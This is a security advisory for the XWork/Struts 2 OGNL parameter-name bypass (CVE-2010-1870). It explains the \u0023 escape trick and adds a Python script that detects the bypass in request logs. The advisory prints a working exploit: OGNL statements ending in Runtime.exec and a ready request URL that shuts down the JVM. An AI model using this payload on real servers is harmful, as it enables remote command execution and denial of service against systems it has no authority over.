Attackers can bypass XWork's parameter-name security restrictions and execute arbitrary commands.

Source: Internet
Author: User

Affected Systems:

OpenSymphony XWork < 2.2.0
Apache Group Struts < 2.2.0

Description:

CVE ID: CVE-2010-1870

XWork is a command-pattern framework that underpins Struts 2 and other applications.

XWork does not properly validate the names of user-supplied request parameters before evaluating them. A remote attacker can exploit this to execute arbitrary commands on the server.

In Struts 2, the WebWork framework uses XWork to perform operations and method invocations based on HTTP parameter names. Each HTTP parameter name is evaluated as an OGNL (Object-Graph Navigation Language) expression, so OGNL turns:

user.address.city=Bishkek&user['favoriteDrink']=kumys

into:

Action.getUser().getAddress().setCity("Bishkek")
Action.getUser().setFavoriteDrink("kumys")

This is done by ParametersInterceptor, which calls ValueStack.setValue() with the user-supplied parameter name as the OGNL expression and the parameter value as the value to assign.

Besides getting and setting properties, OGNL also supports:

* method invocation: foo()
* static method invocation: @java.lang.System@exit(1)
* constructor invocation: new MyClass()
* context variable handling: #foo = new MyClass()

Because HTTP parameter names are evaluated as OGNL, XWork relies on two variables to stop an attacker from invoking arbitrary methods through a parameter name:

* the OgnlContext property xwork.MethodAccessor.denyMethodExecution (true by default)
* the private field allowStaticMethodAccess of SecurityMemberAccess (false by default)

To give developers convenient access to common objects, XWork predefines a number of context variables:

* #application
* #session
* #request
* #parameters
* #attr
* #context
* #_memberAccess
* #root
* #this
* #_typeResolver
* #_classResolver
* #_traceEvaluations
* #_lastEvaluation
* #_keepLastEvaluation

These variables expose server-side objects. To prevent tampering with them, XWork's ParametersInterceptor rejects any parameter name that contains the '#' character. The check only looks for the literal character, however: if '#' is written as the Java Unicode escape \u0023, the name passes the interceptor, and OGNL's parser resolves the escape back to '#' when it evaluates the expression. An attacker can therefore reach #_memberAccess and #context, switch off both of the protections above, and then call static and instance methods freely:

#_memberAccess['allowStaticMethodAccess'] = true
#foo = new java.lang.Boolean("false")
#context['xwork.MethodAccessor.denyMethodExecution'] = #foo
#rt = @java.lang.Runtime@getRuntime()
#rt.exec('mkdir /tmp/PWNED')

<* Source: Meder Kydyraliev (Bugtraq@web.areopag.net)

Links: http://secunia.com/advisories/32495/
http://www.exploit-db.com/exploits/14360/
*>

Test method:

Warning

The following procedure may be harmful and is intended for security research and teaching only. Use it at your own risk.

http://mydomain/MyStruts.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1

Each parameter name here is an OGNL expression of the form (expr1)(expr2): OGNL evaluates expr1, treats the resulting string as a further expression, and evaluates that with the value of expr2 as its root. The string literals carry the escapes, \u0023 for '#' (which the interceptor would reject as a literal character) and \u003d for '=' (which would otherwise be taken as the end of the parameter name in the query string). The first parameter sets allowStaticMethodAccess to true, the second stores a Boolean false in #foo and assigns it to denyMethodExecution, and the third obtains the Runtime and calls exit(1), which shuts down the JVM; the exec() call shown in the description uses the same construction.
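As an added example (not code from the advisory, from XWork or from Struts), the Python below reproduces the shape of the two parameter-name checks, the blacklist XWork used before 2.2.0 and the whitelist the fix introduced, and resolves Java \uXXXX escapes the way OGNL's parser does, so that the request above can be taken apart offline and the same test can be run over parameter names pulled from web server or proxy logs. The request is constructed for this example and points at no real host; the exact form of both checks is reproduced from memory of the XWork source and is an assumption to be confirmed against the vendor patch referenced in this advisory. All function names are mine.

```python
"""Added example (not code from the advisory, XWork or Struts): compare the
parameter-name filter XWork used before 2.2.0 with the whitelist the fix
introduced, and show what an escaped name becomes once OGNL resolves Java
\\uXXXX escapes. Both checks are reproduced from memory of the XWork source
(an assumption; confirm against the vendor patch). The request below is
constructed for this example and points at no real host."""
import re
from urllib.parse import parse_qsl

# Constructed request in the shape of the advisory's PoC, plus one benign
# parameter and one that carries a percent-encoded literal '#'.
SAMPLE_URL = (
    r'''http://mydomain/MyStruts.action?'''
    r'''('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true'''
    r'''&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')'''
    r'''(\u0023foo\u003dnew%20java.lang.Boolean("false")))'''
    r'''&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1'''
    r'''&user.address.city=Bishkek'''
    r'''&%23session.admin=true'''
)


def acceptable_name_pre_2_2(name: str) -> bool:
    """Blacklist used by ParametersInterceptor.acceptableName() before the fix
    (assumed shape): reject a name only if it literally contains '=', ',',
    '#' or ':'. A backslash-escaped '#' is not noticed."""
    return not any(c in name for c in "=,#:")


# Whitelist introduced by the fix (assumed shape of acceptedParamNames):
# letters, digits, '.', '[', ']', '(', ')', '_', a single quote and whitespace.
# Neither '\' nor '@' nor '#' is in the set, so escape tricks are rejected
# before the name ever reaches OGNL.
ACCEPTED_PARAM_NAMES = re.compile(r"[a-zA-Z0-9.\]\[()_'\s]+")


def acceptable_name_2_2(name: str) -> bool:
    return ACCEPTED_PARAM_NAMES.fullmatch(name) is not None


JAVA_UNICODE_ESCAPE = re.compile(r"\\u([0-9a-fA-F]{4})")


def resolve_unicode_escapes(name: str) -> str:
    """What OGNL's parser sees: Java-style \\uXXXX escapes become characters,
    so '\\u0023' is '#' and '\\u003d' is '='."""
    return JAVA_UNICODE_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), name)


def analyse(url: str) -> list:
    """One record per query parameter: the raw (URL-decoded) name, the name
    after escape resolution, the verdict of each filter, and whether the
    name hid a '#' from the blacklist."""
    # Split on '?' by hand: urlsplit() would treat a literal '#' as the start
    # of a fragment, which is not what a servlet container does.
    query = url.partition("?")[2]
    records = []
    for raw_name, _value in parse_qsl(query, keep_blank_values=True):
        decoded = resolve_unicode_escapes(raw_name)
        records.append({
            "name": raw_name,
            "decoded": decoded,
            "old_check_accepts": acceptable_name_pre_2_2(raw_name),
            "new_check_accepts": acceptable_name_2_2(raw_name),
            "hidden_hash": "#" in decoded and "#" not in raw_name,
        })
    return records


def bypass_names(url: str) -> list:
    """Names the pre-2.2.0 filter accepts although they reach an OGNL
    context variable once escapes are resolved: the detection signature for
    this advisory when scanning request logs."""
    return [r["decoded"] for r in analyse(url)
            if r["old_check_accepts"] and r["hidden_hash"]]


if __name__ == "__main__":
    for r in analyse(SAMPLE_URL):
        print(f"old={r['old_check_accepts']!s:5} new={r['new_check_accepts']!s:5} "
              f"hidden#={r['hidden_hash']!s:5} {r['decoded']}")
```

Run as a script, it prints one line per parameter: the three PoC names pass the old blacklist and fail the new whitelist, the benign user.address.city passes both, and the percent-encoded %23session.admin is caught by both because the container decodes it to a literal '#' before the interceptor sees it. bypass_names() is the part worth keeping: any logged parameter name that the old filter would accept but that resolves to a '#' is an attempt at this bypass.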

Suggestion:

Vendor patch:

Apache Group
------------
The vendor has released a patch for this issue (XWork 2.2.0 and later include it). Download it from:

http://svn.apache.org/viewvc?view=revision&revision=956389
